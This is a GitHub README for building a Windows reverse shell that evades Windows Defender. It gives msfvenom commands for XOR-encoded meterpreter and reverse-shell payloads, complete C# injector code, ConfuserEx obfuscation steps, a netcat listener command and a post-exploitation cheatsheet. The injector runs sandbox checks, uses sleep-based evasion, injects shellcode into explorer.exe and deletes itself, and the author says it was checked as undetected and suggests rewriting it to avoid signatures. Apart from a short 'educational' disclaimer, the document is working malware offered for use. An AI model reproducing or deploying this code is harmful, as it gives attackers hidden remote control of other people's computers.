ZE
zebbern/Windows-Defender
This demonstrates how to build a reverse shell while bypassing windows defender [For Educational Purposes]
Reverse Shell Creation & AV Evasion
⚠️ WarningFor authorized lab use only.
Running these techniques on systems you do not own or without permission is illegal.
This repository is provided “as is”, without warranty of any kind. The author assumes no liability for any misuse. By using any part of this code you agree to comply with all applicable laws and gain explicit permission before running it against a system.
Note
The C# injector Working Undetected From Windows Defender
Last Checked: 19.Mai.2025
The C# injector Code is Public Here So i Expect it to be patched soon by someone posting this on virustotal and giving the string away so i recommend reconstructing the C# code to your own.
Prerequisites
- Visual Studio 2022 (with .NET Framework support)
- ConfuserEx (download here)
- Kali Linux (for
msfvenompayload generation) - Basic knowledge of C# and command-line tools.
Generate XOR‑encrypted shell‑code/Payload
Choose which line you want to create the payload you can test all 3:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 EXITFUNC=thread --encrypt xor --encrypt-key j
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 EXITFUNC=thread -f csharp --encrypt xor --encrypt-key j
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 EXITFUNC=thread -f csharp
You Will Get something like this copy everything even the Byte[] text:
Open C# Visual studio 2022
Choose Console App (.NET Framework) And create Project
Paste This injector Code & edit the namespace inject to ur own namespace name
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace inject
{
internal class Program
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr FlsAlloc(IntPtr callback);
static void Main(string[] args)
{
// Check if we're in a sandbox by calling a rare-emulated API
if (VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0) == IntPtr.Zero)
{
return;
}
IntPtr ptrCheck = FlsAlloc(IntPtr.Zero);
if (ptrCheck == null)
{
return;
}
// uncomment the following code if the sand box has internet
//string exename = "Injector+heuristics";
//if (Path.GetFileNameWithoutExtension(Environment.GetCommandLineArgs()[0]) != exename)
//{
// return;
//}
//if (Environment.MachineName != "EC2AMAZ-CRPLELS")
//{
// return;
//}
//try
//{
// HttpWebRequest req = (HttpWebRequest)WebRequest.Create("http://bossjdjiwn.com/");
// HttpWebResponse res = (HttpWebResponse)req.GetResponse();
//
// if (res.StatusCode == HttpStatusCode.OK)
// {
// return;
// }
//}
//catch (WebException we)
//{
// Console.WriteLine("\r\nWebException Raised. The following error occured : {0}", we.Status);
//}
// Sleep to evade in-memory scan + check if the emulator did not fast-forward through the sleep instruction
var rand = new Random();
uint dream = (uint)rand.Next(10000, 20000);
double delta = dream / 1000 - 0.5;
DateTime before = DateTime.Now;
Sleep(dream);
if (DateTime.Now.Subtract(before).TotalSeconds < delta)
{
Console.WriteLine("Joker, get the rifle out. We're being fucked.");
return;
}
Process[] pList = Process.GetProcessesByName("explorer");
if (pList.Length == 0)
{
// Console.WriteLine("[-] No such process!");
System.Environment.Exit(1);
}
int processId = pList[0].Id;
// 0x001F0FFF = PROCESS_ALL_ACCESS
IntPtr hProcess = OpenProcess(0x001F0FFF, false, processId);
IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
By zebbern SHELLCODE PAYLOAD HERE CHOOSE FROM ABOVE THIS TEXT PUT IT IN KALI PASTE THE SCRIPT
// XOR-decrypt the shellcode
for (int i = 0; i < buf.Length; i++)
{
buf[i] = (byte)(buf[i] ^ (byte)'j');
}
IntPtr outSize;
WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize);
IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
// Launch a separate process to delete the executable
string currentExecutablePath = Process.GetCurrentProcess().MainModule.FileName;
Process.Start(new ProcessStartInfo()
{
Arguments = "/C choice /C Y /N /D Y /T 3 & Del \"" + currentExecutablePath + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
});
}
}
}Now Copy The Code We Generated From msfvenom Above
Replace this code line in the c# script
By zebbern SHELLCODE PAYLOAD HERE CHOOSE FROM ABOVE THIS TEXT PUT IT IN KALI PASTE THE SCRIPT
With the generated msfvenom payload
byte[] buf = new byte[460] {0x96,0x22 etc...............0xbf};
Now It should look something like this:
Now go to Configuration Manager... & Make it like in the pictures
Hide the Console Window
- Project → Properties → Application → Output Type → Windows Application
- Re‑build (Release | x64).
Now build the solution
If you now see in console: Build success You have done correct
Now Lets Obfuscate Using (ConfuserEx)
- Drag the fresh
.exeinto ConfuserEx - Preset = Normal → add ~10 random protections → Protect
- The obfuscated binary appears in
/Confused/.
Go to settings Click the .exe listed and click +
Make it to Preset Normal and click +
Add these in a random order it should be 10
Click Done Then Click Protect
Run & Test
- Listener (attacker):
rlwrap -cAr nc -lvnp 443
- Target: double‑click the obfuscated payload.
- Success → a shell or Meterpreter session connects back.
Tip: use a high‑numbered port (e.g. 443, 8443) that the firewall allows.
)
Post‑exploitation Cheatsheet
whoami
systeminfo
ipconfig /all
net users
net localgroup administrators
Troubleshooting
| Issue | Fix |
|---|---|
| Payload deleted on save | Verify EXE is obfuscated and shell‑code is XOR‑encoded |
| No callback | Check IP/LPORT, outbound firewall, AV quarantine |
| Program exits instantly | Sandbox/timing checks triggered – comment them for lab use |
| ConfuserEx “resource not found” | Make sure you built **Release |
Credits
Appendix – One‑liner XOR Encoder (PowerShell)
# Encode sc.bin with key 0x6A
[byte[]]$sc = Get-Content sc.bin -Encoding Byte
$key = 0x6A
$enc = $sc | ForEach-Object { $_ -bxor $key }
[System.IO.File]::WriteAllBytes('sc_xor.bin', $enc)Happy (legal) hacking! 🛡️